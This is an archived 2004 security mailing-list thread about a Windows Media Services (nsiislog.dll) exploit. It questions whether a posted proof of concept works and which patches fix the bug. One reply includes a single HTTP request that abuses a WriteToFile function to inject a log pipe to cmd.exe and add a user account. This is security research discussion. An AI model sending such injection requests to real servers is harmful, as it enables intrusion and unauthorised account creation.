Dailydave mailing list archives
Re: New mediaservices sploit
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Sat, 13 Mar 2004 12:57:30 -0600
The code was posted to a few sites, it doesn't crash nor exploit any version of nsiislog.dll that I could find. Tested multiple variations on a stock Windows 2000 SP0 system without any real result. I am assuming that since its in CANVAS, it actually works on /something/, are there any special circumstances required to trigger it? Does the MS03-019 patch have to be installed for it be vulnerable to this MX_Stats overflow? It almost sounds like it is just another variation of the POST bug... is it also fixed by MS03-022? Brett actually found three bugs in this ISAPI; the original chunked encoding one, then the POST content overflow, and finally the one which was released by M$ last week. Does anyone have details on the latest vuln? Bonus points to anyone who can find a better way to exploit the unnamed bug^H^H^Hfeature below, without being dependent on an alternate web service or third-party software. The goal is instant command execution through writing a file to the system with arbitrary (even binary) contents. Writing to autoexec, startup, etc doesn't work since it requires user interaction. Assuming Windows 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work now that signatures are embedded (thanks Brett for info). GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen% 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c% 20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0 -HD On Saturday 13 March 2004 10:55, Dave Aitel wrote:
Securityfocus's vulnerability database isn't really that good for accuracy. I checked out their update on this media services bug, and noticed that one of the sploits is for something that was never publicly released. This is a new bug, not the old bug that Brett Moore found. http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker. c (It's in CANVAS as well, btw) -dave _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- RE: New mediaservices sploit Brett Moore (Mar 14)
- RE: New mediaservices sploit Dave Aitel (Mar 14)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- execution by WriteToFile? (was Re: New mediaservices sploit) Max Vision (Mar 14)